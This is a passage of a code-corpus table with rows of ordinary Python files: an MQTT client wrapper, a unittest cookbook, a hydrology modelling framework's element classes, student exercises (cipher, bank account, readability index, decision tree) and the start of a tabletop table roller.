blob_id stringlengths 40 40 | language stringclasses 1
value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30
values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2
values | text stringlengths 12 5.47M | download_success bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
b6caef7261fe05f05935b689f38e7759e42a4851 | Python | magasser/augis | /controls/raspberry-pi/mqtt.py | UTF-8 | 1,245 | 2.71875 | 3 | [] | no_license | """
Authors: Manuel Gasser, Julian Haldimann
Created: 02.03.2021
Last Modified: 08.05.2021
"""
import logging as log
import paho.mqtt.client as mqtt
import thread_handler as th
from config import Config
class Mqtt(mqtt.Client):
"""
Publish a payload to a specific topic.
:param topic: The topic is the place where the message should be published
:param payload: The payload is the data that should be published
"""
def pub(self, topic, payload, qos=1, retain=False):
with th.locks["pub_lock"]:
self.publish(topic, payload, qos=1, retain=retain)
"""
Subscribe to a specific topic to receive messages
:param topic: The topic is the route where the message appears
"""
def sub(self, topic, qos=1):
self.subscribe(topic, qos=qos)
"""
Connect to the mqtt client with username and password
"""
def connect_to_client(self, domain=Config.DOMAIN, port=Config.PORT, keepalive=60):
self.username_pw_set(Config.USER, Config.PASSWORD)
try:
self.connect(domain, port, keepalive=keepalive)
except (ConnectionError, OSError, ValueError) as err:
log.error(f"Could not connect to MQTT on: {domain}:{port}, Stacktrace {err}")
| true |
2149216e3f81ec28af5881759681e6327900c63e | Python | NatanBagrov/DeepLearning | /hw2/graph/GraphNode.py | UTF-8 | 405 | 2.546875 | 3 | [] | no_license | from abc import abstractmethod
class GraphNode:
def __init__(self):
self._value = None
def get_value(self):
return self._value
@abstractmethod
def forward(self):
raise NotImplementedError()
@abstractmethod
def backward(self, grads=None):
raise NotImplementedError()
@abstractmethod
def reset(self):
raise NotImplementedError()
| true |
c6247e1c3a4939c447a00ea9afe24c8311912403 | Python | guoyujiao/cookbook | /py/testing/_unittest.py | UTF-8 | 5,174 | 3.375 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'''@package py
Unit Testing Cookbook.
The Python unit testing framework, sometimes referred to as “PyUnit,” is a
Python language version of JUnit, by *Kent Beck* and *Erich Gamma*. JUnit is,
in turn, a Java version of Kent’s Smalltalk testing framework. Each is the de
facto standard unit testing framework for its respective language.
To achieve this, `unittest` supports some important testing concepts:
- test fixture
> A **test fixture** represents the preparation needed to perform one or more
> tests, and any associate clean-up actions. This may involve, for example,
> creating temporary or proxy databases, directories, or starting a server
> process.
- test case
> A **test case** is the smallest unit of testing. It checks for a specific
> response to a particular set of inputs. `unittest` provides a base class,
> `TestCase`, which may be used to create new test cases.
- test suite
> A **test suite** is a collection of test cases, test suites, or both. It is
> used to aggregate tests that should be executed together.
- test runner
> A **test runner** is a component which orchestrates the execution of tests
> and provides the outcome to the user. The runner may use a graphical
> interface, a textual interface, or return a special value to indicate the
> results of executing the tests.
Copyright (c) 2014 Li Yun <leven.cn@gmail.com>
All Rights Reserved.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
'''
import unittest
def func_1():
'''No return.
'''
pass
def func_2(a):
'''Echo.
'''
return a
def func_3():
'''Raise an exception (ValueError).
@exception ValueError
>>> func_4()
Traceback (most recent call last):
...
ValueError: error description
'''
raise ValueError("error description")
class _UnitTestTestCase(unittest.TestCase):
def setUp(self):
# Initialization
pass
def tearDown(self):
# Clean up
pass
#@unittest.skip("<reason>")
#@unittest.skipIf(<condition>, "<reason>")
#@unittest.skipUnless(<condition>, "<reason>")
#@unittest.expectedFailure
def test_func_1(self):
# Testing
#
# self.assertTrue(a) a
# self.assertFalse(a) not a
# self.assertIs(a, b) a is b
# self.assertIsNot(a, b) a is not b
# self.assertIsNone(a) a is None
# self.assertIsNotNone(a) a is not None
# self.assertIn(a, b) a in b
# self.assertNotIn(a, b) a not in b
# self.assertIsInstance(a, b) isinstance(a, b)
# self.assertNotIsInstance(a, b) not isinstance(a, b)
# self.assertEqual(a, b) a == b
# self.assertNotEqual(a, b) a != b
# self.assertGreater(a, b) a > b
# self.assertLess(a ,b) a < b
# self.assertGreaterEqual(a, b) a >= b
# self.assertLessEqual(a, b) a <= b
#
# with self.assertRaises(Error): raise Error
# func(a, b)
pass
def test_func_2(self):
self.assertTrue(func_2(True))
self.assertFalse(func_2(False))
self.assertIs(func_2(None), None)
self.assertIsNot(func_2([1,2]), None)
self.assertIsNone(func_2(None))
self.assertIn(func_2(1), [1,2])
self.assertNotIn(func_2(3), [1,2])
self.assertIsInstance(func_2(1), int)
self.assertNotIsInstance(func_2(1), str)
self.assertEqual(func_2(1), 1)
self.assertNotEqual(func_2(1), 2)
self.assertGreater(func_2(1), 0)
self.assertGreaterEqual(func_2(1), 0)
self.assertGreaterEqual(func_2(1), 1)
self.assertLess(func_2(1), 2)
self.assertLessEqual(func_2(1), 2)
self.assertLessEqual(func_2(1), 1)
def test_func_3(self):
with self.assertRaises(ValueError):
func_3()
def load_tests(loader, tests, ignore):
'''Doc-testing integrating with unit-testing.
'''
import doctest
import _doctest
finder = doctest.DocTestFinder(exclude_empty=False)
suite = doctest.DocTestSuite(_doctest, test_finder=finder)
tests.addTests(suite)
return tests
if __name__ == '__main__':
unittest.main()
| true |
805f3766860b7ecc6605cf0a1386655385bf168c | Python | exepulveda/superflexPy | /superflexpy/framework/element.py | UTF-8 | 25,178 | 3.0625 | 3 | [
"Apache-2.0"
] | permissive | """
Copyright 2020 Marco Dal Molin et al.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
This file is part of the SuperflexPy modelling framework. For details about it,
visit the page https://superflexpy.readthedocs.io
CODED BY: Marco Dal Molin
DESIGNED BY: Marco Dal Molin, Fabrizio Fenicia
This file contains the implementation of Element classes with different levels
of specialization.
"""
from copy import deepcopy, copy
import numpy as np
class BaseElement():
"""
This is the abstract class for the creation of a BaseElement. A BaseElement
does not have parameters or states.
"""
_num_downstream = None
"""
Number of downstream elements
"""
_num_upstream = None
"""
Number of upstream elements
"""
input = {}
"""
Dictionary of input fluxes
"""
def __init__(self, id):
"""
This is the initializer of the abstract class BaseElement.
Parameters
----------
id : str
Identifier of the element. All the elements of the framework must
have an identifier.
"""
self.id = id
self._error_message = 'module : superflexPy, Element : {},'.format(id)
self._error_message += ' Error message : '
def set_input(self, input):
"""
To be implemented by any child class. It populates the self.input
dictionary.
Parameters
----------
input : list(numpy.ndarray)
List of input fluxes to the element.
"""
raise NotImplementedError('The set_input method must be implemented')
def get_output(self, solve=True):
"""
To be implemented by any child class. It solves the element and returns
the output fluxes.
Parameters
----------
solve : bool
True if the element has to be solved (i.e. calculate the states).
Returns
-------
list(numpy.ndarray)
List of output fluxes.
"""
raise NotImplementedError('The get_output method must be implemented')
@property
def num_downstream(self):
"""
Number of downstream elements.
"""
return self._num_downstream
@property
def num_upstream(self):
"""
Number of upstream elements
"""
return self._num_upstream
def __repr__(self):
str = 'Module: superflexPy\nElement: {}\n'.format(self.id)
return str
def __copy__(self):
ele = self.__class__(id=self.id)
return ele
def __deepcopy__(self, memo):
ele = self.__class__(id=self.id)
return ele
class ParameterizedElement(BaseElement):
"""
This is the abstract class for the creation of a ParameterizedElement. A
ParameterizedElement has parameters but not states.
"""
_prefix_parameters = ''
"""
Prefix applied to the original names of the parameters
"""
def __init__(self, parameters, id):
"""
This is the initializer of the abstract class ParameterizedElement.
Parameters
----------
parameters : dict
Parameters controlling the element. The parameters can be either
a float (constant in time) or a numpy.ndarray of the same length
of the input fluxes (time variant parameters).
id : str
Identifier of the element. All the elements of the framework must
have an identifier.
"""
BaseElement.__init__(self, id)
self._parameters = parameters
self.add_prefix_parameters(id)
def get_parameters(self, names=None):
"""
This method returns the parameters of the element.
Parameters
----------
names : list(str)
Names of the parameters to return. The names must be the ones
returned by the method get_parameters_name. If None, all the
parameters are returned.
Returns
-------
dict:
Parameters of the element.
"""
if names is None:
return self._parameters
else:
return {n: self._parameters[n] for n in names}
def get_parameters_name(self):
"""
This method returns the names of the parameters of the element.
Returns
-------
list(str):
List with the names of the parameters.
"""
return list(self._parameters.keys())
def set_parameters(self, parameters):
"""
This method sets the values of the parameters.
Parameters
----------
parameters : dict
Contains the parameters of the element to be set. The keys must be
the ones returned by the method get_parameters_name. Only the
parameters that have to be changed should be passed.
"""
for k in parameters.keys():
if k not in self._parameters.keys():
message = '{}The parameter {} does not exist'.format(self._error_message, k)
raise KeyError(message)
self._parameters[k] = parameters[k]
def add_prefix_parameters(self, prefix):
"""
This method add a prefix to the name of the parameters of the element.
Parameters
----------
prefix : str
Prefix to be added. It cannot contain '_'.
"""
if '_' in prefix:
message = '{}The prefix cannot contain \'_\''.format(self._error_message)
raise ValueError(message)
# Extract the prefixes in the parameters name
splitted = list(self._parameters.keys())[0].split('_')
if prefix not in splitted:
# Apply the prefix
for k in list(self._parameters.keys()):
value = self._parameters.pop(k)
self._parameters['{}_{}'.format(prefix, k)] = value
# Save the prefix for furure uses
self._prefix_parameters = '{}_{}'.format(prefix, self._prefix_parameters)
def __repr__(self):
str = 'Module: superflexPy\nElement: {}\n'.format(self.id)
str += 'Parameters:\n'
for k in self._parameters:
str += '\t{} : {}\n'.format(k, self._parameters[k])
return str
def __copy__(self):
p = self._parameters # Only the reference
ele = self.__class__(parameters=p,
id=self.id)
ele._prefix_parameters = self._prefix_parameters
return ele
def __deepcopy__(self, memo):
p = deepcopy(self._parameters) # Create a new dictionary
ele = self.__class__(parameters=p,
id=self.id)
ele._prefix_parameters = self._prefix_parameters
return ele
class StateElement(BaseElement):
"""
This is the abstract class for the creation of a StateElement. A
StateElement has states but not parameters.
"""
_prefix_states = ''
"""
Prefix applied to the original names of the parameters
"""
def __init__(self, states, id):
"""
This is the initializer of the abstract class StateElement.
Parameters
----------
states : dict
Initial states of the element. Depending on the element the states
can be either a float or a numpy.ndarray.
id : str
Identifier of the element. All the elements of the framework must
have an id.
"""
BaseElement.__init__(self, id)
self._states = states
self._init_states = deepcopy(states) # It is used to re-set the states
self.add_prefix_states(id)
def get_states(self, names=None):
"""
This method returns the states of the element.
Parameters
----------
names : list(str)
Names of the states to return. The names must be the ones
returned by the method get_states_name. If None, all the
states are returned.
Returns
-------
dict:
States of the element.
"""
if names is None:
return self._states
else:
return {n: self._states[n] for n in names}
def get_states_name(self):
"""
This method returns the names of the states of the element.
Returns
-------
list(str):
List with the names of the states.
"""
return list(self._states.keys())
def set_states(self, states):
"""
This method sets the values of the states.
Parameters
----------
states : dict
Contains the states of the element to be set. The keys must be
the ones returned by the method get_states_name. Only the
states that have to be changed should be passed.
"""
for k in states.keys():
if k not in self._states.keys():
message = '{}The state {} does not exist'.format(self._error_message, k)
raise KeyError(message)
self._states[k] = states[k]
def reset_states(self):
"""
This method sets the states to the values provided to the __init__
method. If a state was initialized as None, it will not be reset.
"""
for k in self._init_states.keys():
k_no_prefix = k.split('_')[-1]
if self._init_states[k] is not None:
self._states[self._prefix_states + k_no_prefix] = deepcopy(self._init_states[k]) # I have to isolate
def add_prefix_states(self, prefix):
"""
This method add a prefix to the id of the states of the element.
Parameters
----------
prefix : str
Prefix to be added. It cannot contain '_'.
"""
if '_' in prefix:
message = '{}The prefix cannot contain \'_\''.format(self._error_message)
raise ValueError(message)
# Extract the prefixes in the parameters name
splitted = list(self._states.keys())[0].split('_')
if prefix not in splitted:
# Apply the prefix
for k in list(self._states.keys()):
value = self._states.pop(k)
self._states['{}_{}'.format(prefix, k)] = value
# Save the prefix for furure uses
self._prefix_states = '{}_{}'.format(prefix, self._prefix_states)
def __repr__(self):
str = 'Module: superflexPy\nElement: {}\n'.format(self.id)
str += 'States:\n'
for k in self._states:
str += '\t{} : {}\n'.format(k, self._states[k])
return str
def __copy__(self):
s = deepcopy(self._states) # Create a new dictionary
ele = self.__class__(states=s,
id=self.id)
ele._prefix_states = self._prefix_states
return ele
def __deepcopy__(self, memo):
s = deepcopy(self._states) # Create a new dictionary
ele = self.__class__(states=s,
id=self.id)
ele._prefix_states = self._prefix_states
return ele
class StateParameterizedElement(StateElement, ParameterizedElement):
"""
This is the abstract class for the creation of a StateParameterizedElement.
A StateParameterizedElement has parameters and states.
"""
def __init__(self, parameters, states, id):
"""
This is the initializer of the abstract class
StateParameterizedElement.
Parameters
----------
parameters : dict
Parameters controlling the element. The parameters can be either
a float (constant in time) or a numpy.ndarray of the same length
of the input fluxes (time variant parameters).
states : dict
Initial states of the element. Depending on the element the states
can be either a float or a numpy.ndarray.
id : str
Identifier of the element. All the elements of the framework must
have an id.
"""
StateElement.__init__(self, states, id)
ParameterizedElement.__init__(self, parameters, id)
def __repr__(self):
str = 'Module: superflexPy\nElement: {}\n'.format(self.id)
str += 'Parameters:\n'
for k in self._parameters:
str += '\t{} : {}\n'.format(k, self._parameters[k])
str += 'States:\n'
for k in self._states:
str += '\t{} : {}\n'.format(k, self._states[k])
return str
def __copy__(self):
p = self._parameters # Only the reference
s = deepcopy(self._states) # Create a new dictionary
ele = self.__class__(parameters=p,
states=s,
id=self.id)
ele._prefix_states = self._prefix_states
ele._prefix_parameters = self._prefix_parameters
return ele
def __deepcopy__(self, memo):
p = deepcopy(self._parameters) # Create a new dictionary
s = deepcopy(self._states) # Create a new dictionary
ele = self.__class__(parameters=p,
states=s,
id=self.id)
ele._prefix_states = self._prefix_states
ele._prefix_parameters = self._prefix_parameters
return ele
class ODEsElement(StateParameterizedElement):
"""
This is the abstract class for the creation of a ODEsElement. An ODEsElement
is an element with states and parameters that is controlled by an ordinary
differential equation, of the form:
dS/dt = input - output
"""
_num_upstream = 1
"""
Number of upstream elements
"""
_num_downstream = 1
"""
Number of downstream elements
"""
_solver_states = []
"""
List of states used by the solver of the differential equation
"""
_fluxes = []
"""
This attribute contains a list of methods (one per differential equation)
that calculate the values of the fluxes needed to solve the differential
equations that control the element. The single functions must return the
fluxes as a list where incoming fluxes are positive and outgoing are
negative. Here is a list of the required outputs of the single functions:
list(floats)
Values of the fluxes given states, inputs, and parameters.
float
Minimum value of the state. Used, sometimes, by the numerical solver
to search for the solution.
float
Maximum value of the state. Used, sometimes, by the numerical solver
to search for the solution.
"""
def __init__(self, parameters, states, approximation, id):
"""
This is the initializer of the abstract class ODEsElement.
Parameters
----------
parameters : dict
Parameters controlling the element. The parameters can be either
a float (constant in time) or a numpy.ndarray of the same length
of the input fluxes (time variant parameters).
states : dict
Initial states of the element. Depending on the element the states
can be either a float or a numpy.ndarray.
approximation : superflexpy.utils.numerical_approximation.NumericalApproximator
Numerial method used to approximate the differential equation
id : str
Identifier of the element. All the elements of the framework must
have an id.
"""
StateParameterizedElement.__init__(self, parameters=parameters,
states=states, id=id)
self._num_app = approximation
def set_timestep(self, dt):
"""
This method sets the timestep used by the element.
Parameters
----------
dt : float
Timestep
"""
self._dt = dt
def get_timestep(self):
"""
This method returns the timestep used by the element.
Returns
-------
float
Timestep
"""
return self._dt
def define_numerical_approximation(self, approximation):
"""
This method define the solver to use for the differential equation.
Parameters
----------
solver : superflexpy.utils.root_finder.RootFinder
Solver used to find the root(s) of the differential equation(s).
Child classes may implement their own solver, therefore the type
of the solver is not enforced.
"""
self._num_app = approximation
def _solve_differential_equation(self, **kwargs):
"""
This method calls the solver of the differential equation(s). When
called, it solves the differential equation(s) for all the timesteps
and populates self.state_array.
"""
if len(self._solver_states) == 0:
message = '{}the attribute _solver_states must be filled'.format(self._error_message)
raise ValueError(message)
self.state_array = self._num_app.solve(fun=self._fluxes,
S0=self._solver_states,
dt=self._dt,
**self.input,
**{k[len(self._prefix_parameters):]: self._parameters[k] for k in self._parameters},
**kwargs)
def __copy__(self):
p = self._parameters # Only the reference
s = deepcopy(self._states) # Create a new dictionary
ele = self.__class__(parameters=p,
states=s,
id=self.id,
approximation=self._num_app)
ele._prefix_states = self._prefix_states
ele._prefix_parameters = self._prefix_parameters
return ele
def __deepcopy__(self, memo):
p = deepcopy(self._parameters) # Create a new dictionary
s = deepcopy(self._states) # Create a new dictionary
ele = self.__class__(parameters=p,
states=s,
id=self.id,
approximation=self._num_app)
ele._prefix_states = self._prefix_states
ele._prefix_parameters = self._prefix_parameters
return ele
class LagElement(StateParameterizedElement):
"""
This is the abstract class for the creation of a LagElement. An LagElement
is an element with states and parameters that distributes the incoming
fluxes according to a weight array
Parameters must be called:
- 'lag-time': characteristic time of the lag. Its definition depends on the
specific implementations of the element. It can be a scalar (it will be
applied to all the fluxes) or a list (with length equal to the number of
fluxes).
States must be called:
- lag: initial state of the lag function. If None it will be initialized
to zeros. It can be a numpy.ndarray (it will be applied to all the fluxes)
of a list on numpy.ndarray (with length equal to the number of fluxes).
"""
_num_upstream = 1
"""
Number of upstream elements
"""
_num_downstream = 1
"""
Number of downstream elements
"""
def _build_weight(self, lag_time):
"""
This method must be implemented by any child class. It calculates the
weight array(s) based on the lag_time.
Parameters
----------
lag_time : float
Characteristic time of the lag function.
Returns
-------
list(numpy.ndarray)
List of weight array(s).
"""
raise NotImplementedError('The _build_weight method must be implemented')
def set_input(self, input):
"""
This method sets the inputs to the elements. Since the name of the
inputs is not important, the fluxes are stored as list.
Parameters
----------
input : list(numpy.ndarray)
List of input fluxes.
"""
self.input = input
def get_output(self, solve=True):
"""
This method returns the output of the LagElement. It applies the lag
to all the incoming fluxes, according to the weight array(s).
Parameters
----------
solve : bool
True if the element has to be solved (i.e. calculate the states).
Returns
-------
list(numpy.ndarray)
List of output fluxes.
"""
if solve:
# Create lists if we are dealing with scalars
if isinstance(self._parameters[self._prefix_parameters + 'lag-time'], float):
lag_time = [self._parameters[self._prefix_parameters + 'lag-time']] * len(self.input)
elif isinstance(self._parameters[self._prefix_parameters + 'lag-time'], list):
lag_time = self._parameters[self._prefix_parameters + 'lag-time']
else:
par_type = type(self._parameters[self._prefix_parameters + 'lag-time'])
message = '{}lag_time parameter of type {}'.format(self._error_message, par_type)
raise TypeError(message)
if self._states[self._prefix_states + 'lag'] is None:
lag_state = self._init_lag_state(lag_time)
else:
if isinstance(self._states[self._prefix_states + 'lag'], np.ndarray):
lag_state = [copy(self._states[self._prefix_states + 'lag'])] * len(self.input)
elif isinstance(self._states[self._prefix_states + 'lag'], list):
lag_state = self._states[self._prefix_states + 'lag']
else:
state_type = type(self._states[self._prefix_states + 'lag'])
message = '{}lag state of type {}'.format(self._error_message, state_type)
raise TypeError(message)
self._weight = self._build_weight(lag_time)
self.state_array = self._solve_lag(self._weight, lag_state, self.input)
# Get the new lag value to restart
final_states = self.state_array[-1, :, :]
final_states[:, :-1] = final_states[:, 1:]
final_states[:, -1] = 0
self.set_states({self._prefix_states + 'lag': [final_states[i, :len(w)] for i, w in enumerate(self._weight)]})
return [self.state_array[:, i, 0] for i in range(len(self.input))]
def reset_states(self):
"""
This method sets the states to the values provided to the __init__
method. In this case, if a state was initialized as None, it will be
set back to None.
"""
for k in self._init_states.keys():
k_no_prefix = k.split('_')[-1]
self._states[self._prefix_states + k_no_prefix] = deepcopy(self._init_states[k]) # I have to isolate
@staticmethod
def _solve_lag(weight, lag_state, input):
"""
This method distributes the input fluxes according to the weight array
and the initial state.
Parameters
----------
weight : list(numpy.ndarray)
List of weights to use
lag_state : list(numpy.ndarray)
List of the initial states of the lag.
input : list(numpy.ndarray)
List of fluxes
Returns
-------
numpy.ndarray
3D array (dimensions: number of timesteps, number of fluxes, max
lag length) that stores all the states of the lag in time
"""
max_length = max([len(w) for w in weight])
output = np.zeros((len(input[0]), len(weight), max_length)) # num_ts, num_fluxes, len_lag
for flux_num, (w, ls, i) in enumerate(zip(weight, lag_state, input)):
for ts in range(len(input[0])):
updated_state = ls + i[ts] * w
output[ts, flux_num, :len(w)] = updated_state[:]
ls = np.append(updated_state[1:], 0)
return output
def _init_lag_state(self, lag_time):
"""
This method sets the initial state of the lag to arrays of proper
length.
Parameters
----------
lag_time : list(float)
List of lag times
Returns
-------
list(numpy.ndarray)
List of the initial states of the lag.
"""
ini_state = []
for i in range(len(self.input)):
ini_state.append(np.zeros(int(np.ceil(lag_time[i]))))
return ini_state
| true |
7c9920bd57642d1a5232eef1a0174124317c413d | Python | tmu-nlp/100knock2021 | /ueda/chapter01/knock08.py | UTF-8 | 284 | 3.46875 | 3 | [] | no_license | def cipher(sents):
sents = [chr(219-ord(words)) if words.islower() else words for words in sents]
return ''.join(sents)
sent = "Now I need a drink, alcoholic of course, after the heavy lectures involving quantum mechanics."
sent = cipher(sent)
print(sent)
print(cipher(sent)) | true |
e0785ed42feaef9d06f593bb654e47ea4ced7f5c | Python | ruizqa/bankAccount | /bankAccount.py | UTF-8 | 1,230 | 3.9375 | 4 | [] | no_license | class BankAccount:
Accounts = []
def __init__(self,int_rate,balance=0):
self.int_rate = int_rate
self.balance = balance
BankAccount.Accounts.append(self)
def deposit(self,amount):
self.balance += amount
return self
def withdraw(self,amount):
if amount < self.balance:
self.balance -= amount
else:
print("Insufficient funds: Charging a $5 fee")
self.balance -= 5
return self
def display_account_info(self):
print(f"Balance: ${self.balance}")
def yield_interest(self):
if self.balance >0:
self.balance += self.balance * self.int_rate
return self
@classmethod
def printAccounts(cls):
print(f"\nThere are {len(cls.Accounts)} bank accounts:")
for i in cls.Accounts:
print(f"\nAccount #{cls.Accounts.index(i)+1}")
i.display_account_info()
ac1 = BankAccount(0.1,15)
ac1.deposit(10).deposit(15).deposit(25).withdraw(20).yield_interest().display_account_info()
ac2=BankAccount(0.2,5)
ac2.deposit(10).deposit(50).withdraw(1).withdraw(2).withdraw(8).withdraw(100).yield_interest().display_account_info()
BankAccount.printAccounts() | true |
eb4ce8d1b60c42ecc1a1499d470e94c0b76920b6 | Python | sriyuthsagi/CSCI-1100-Computer-Science-I | /Homework/Homework 3/Homework_3_1.py | UTF-8 | 868 | 3.296875 | 3 | [] | no_license | #import
import syllables
#variable input
para = input('Enter a paragraph => ')
print(para)
para1 = para
para = para.split()
length = len(para)
hard = []
syll = 0
#while loop (count hard words and syllables
i = 0
while i < length:
ln = syllables.find_num_syllables(para[i])
syll = syll + ln
if ln > 2:
if not '-' in para[i] or para[i].endswith(('es', 'ed')):
hard.append(para[i])
i += 1
#data processing
ASL = length / para1.count('.')
PHW = (len(hard) / length) * 100
ASYL = syll / length
GFRI = 0.4*(ASL + PHW)
FKRI = 206.835-1.015*ASL-86.4*ASYL
#printing results
print('Here are the hard words in this paragraph:\n', hard)
print('Statistics: ASL:{0:.2f} PHW:{1:.2f}% ASYL:{2:.2f}'.format(ASL, PHW, ASYL))
print('Readability index (GFRI): {0:.2f}'.format(GFRI))
print('Readability index (GFRI): {0:.2f}'.format(FKRI))
| true |
285cdcd75bacac75dbdd1e50579d3574cd815346 | Python | HugoOliveiraSoares/CursoPython | /Listas.py | UTF-8 | 286 | 3.640625 | 4 | [] | no_license | #Iterando listas
lista_num = [100,200,300,400,500,700,50]
#lista_indice = range(4) #[0,1,2,3]
'''
for item in range(len(lista_num)):
lista_num[item] += 1000
print(lista_num)
'''
#funçao enumerate
for idx,item in enumerate(lista_num):
lista_num[idx] += 1000
print(lista_num)
| true |
fc297db360edbf0b29868ee2b6211a2cf098401d | Python | ProtoplasmaDS/Football_ORM2 | /query.py | UTF-8 | 516 | 2.796875 | 3 | [] | no_license | from FootballORM.db.database import use_db,engine, Base, delete_all
from FootballORM.model.my_model import Team,Player
from sqlalchemy import select, text
session = use_db()
first_rec=session.query(Team).first()
print(f"Team: {first_rec.name}")
for n in first_rec.players:
print(f"player: {n.name}")
print("*"*80)
#
# OK lets try and get Newcastle
#
nufc_recs=session.query(Team).filter(Team.name=="Newcastle").first()
print(f"Team: {nufc_recs.name}")
for n in nufc_recs.players:
print(f"player: {n.name}") | true |
fcdaa2322c1048ba6a877e58eab28797253f630d | Python | cbrandao18/python-practice | /common-characters.py | UTF-8 | 447 | 4.125 | 4 | [] | no_license | string1 = raw_input("Input your first string: ")
string2 = raw_input("Input your second string: ")
def get_common_chars(string1, string2):
string1_len = len(string1)
i=0
common_chars = []
while (i < string1_len):
if (string1[i] in string2):
if (string1[i] not in common_chars):
common_chars.append(string1[i])
i = i + 1
return common_chars
print get_common_chars(string1,string2)
| true |
2b280a3e7fca564a17b9b5a9381d0a5c3941c03d | Python | SurajDeuja/IEEE_BSU_TUTORIALS | /python/Functions/Functions.py | UTF-8 | 338 | 3.96875 | 4 | [] | no_license | def factorial(num):
if num == 0 or num == 1:
return 1
else:
return num * factorial(num - 1)
def fibonacci(num):
if num == 0 or num == 1:
return 1
else:
return fibonacci(num - 1) + fibonacci(num - 2)
#print factorial(10)
#print fibonacci(4)
for x in range(0, 10):
print fibonacci(x)
| true |
c691267a92d3c6107ae8ad0142e441ae1d7949a5 | Python | sirlancer/ml_demos | /decision_tree/trees.py | UTF-8 | 3,280 | 3.015625 | 3 | [] | no_license | __author__ = 'lancer'
import operator
import numpy as np
from collections import defaultdict
# Calculate Shannon entropy
def calcShannonEnt(dataSet):
numEntries = len(dataSet)
labelCount = defaultdict(int)
for row in dataSet:
currentLabel = row[-1]
labelCount[currentLabel] += 1
shannonEnt = 0.0
for label in labelCount.keys():
prob = float(labelCount[label]) / numEntries
shannonEnt -= prob * np.log2(prob)
return shannonEnt
# Produce some data
def createDataSet():
dataSet = [[1, 1, 'yes'],
[1, 1, 'yes'],
[1, 0, 'no'],
[0, 1, 'no'],
[0, 1, 'no']]
feaNames = ['no surfacing', 'flippers']
return dataSet, feaNames
# Split dataSet by value according to featureDim(feature dimension)
def splitDataSet(dataSet, featureDim, value):
retDataSet = []
for row in dataSet:
if row[featureDim] == value:
reduceRow = row[:featureDim]
reduceRow.extend(row[featureDim+1:])
retDataSet.append(reduceRow)
return retDataSet
# Split dataSet according to infomation gain
def chooseBestFeatureToSplit(dataSet):
numFeature = len(dataSet[0]) - 1
baseEntropy = calcShannonEnt(dataSet)
infoGain = 0.0
bestFeature = -1
bestInfoGain = 0.0
for i in range(numFeature):
featureValue = [ row[i] for row in dataSet ]
feaValueSet = set(featureValue)
newEntropy = 0.0
for value in feaValueSet:
subDataSet = splitDataSet(dataSet, i, value)
prob = float(len(subDataSet)) / len(dataSet)
newEntropy += prob * calcShannonEnt(subDataSet)
infoGain = baseEntropy - newEntropy
if infoGain > bestInfoGain:
bestInfoGain = infoGain
bestFeature = i
return bestFeature
# Set label by majority vote
def majorityCnt(labelList):
labelCount = defaultdict(int)
for label in labelList:
labelCount[label] += 1
sortedLabelCount = sorted(labelCount.items(), key=operator.itemgetter(1), reversed=True)
return sortedLabelCount[0][0]
# Create decision_tree
def createTree(dataSet, labels):
labelList = [ row[-1] for row in dataSet ]
# All the labels are the same
if labelList.count(labelList[0]) == len(labelList):
return labelList[0]
# Has traversaling all the features
if len(dataSet[0]) == 1:
return majorityCnt(labelList)
feaDim = chooseBestFeatureToSplit(dataSet)
bestFeature = labels[feaDim]
myTree = {bestFeature:{}}
del(labels[feaDim])
feaValues = [ row[feaDim] for row in dataSet]
uniqueFeaValues = set(feaValues)
for value in uniqueFeaValues:
subLabels = labels[:]
myTree[bestFeature][value] = createTree(splitDataSet(dataSet, feaDim, value), subLabels)
return myTree
if __name__ == '__main__':
data, feaNames = createDataSet()
print('data:%s' % data)
# shannonEnt = calcShannonEnt(data)
# print('shannonEnt:%f' % shannonEnt)
# print(splitDataSet(data, 0, 1))
# print(splitDataSet(data, 0, 0))
# bestFeatureDim = chooseBestFeatureToSplit(data)
# print('best feature dimension:%d' % bestFeatureDim)
myTree = createTree(data, feaNames)
print(myTree)
| true |
f5df81fe6f3b6ded7aad718be5fba061689dcc6c | Python | laithadi/School-Work---Python | /Adix5190_l4/t13.py | UTF-8 | 340 | 3.640625 | 4 | [] | no_license | '''
Lab 4, Task 13
Author: Laith Adi & Ashwin Balaje
ID: 170265190 & 180790110
Email: Adix5190@mylaurier.ca & bala0110@mylaurier.ca
__updated__ = "2018-10-04"
'''
fac_int = int(input('Enter an integer: '))
n = fac_int
answer = 1
print('{}! = '.format(n), end='')
while n > 1:
answer *= n
print("{} * ".format(n), end="")
n -= 1
print("1 = {}".format(answer)) | true |
e078fcc42a06219a5dbe727b5a089c34575d9e53 | Python | ShaneSaww/PathfinderTableRoller | /Pathfinder.py | UTF-8 | 4,312 | 3.65625 | 4 | [] | no_license | #!/usr/bin/env python
#############################################
# Pathfinder.py a program that reads input from a text file and rolls on it.
# This program is created to help test random race creation/ revive lists. This list can have many rolling tables that call other rolling tables.
# More details on the FF exist in the FF.
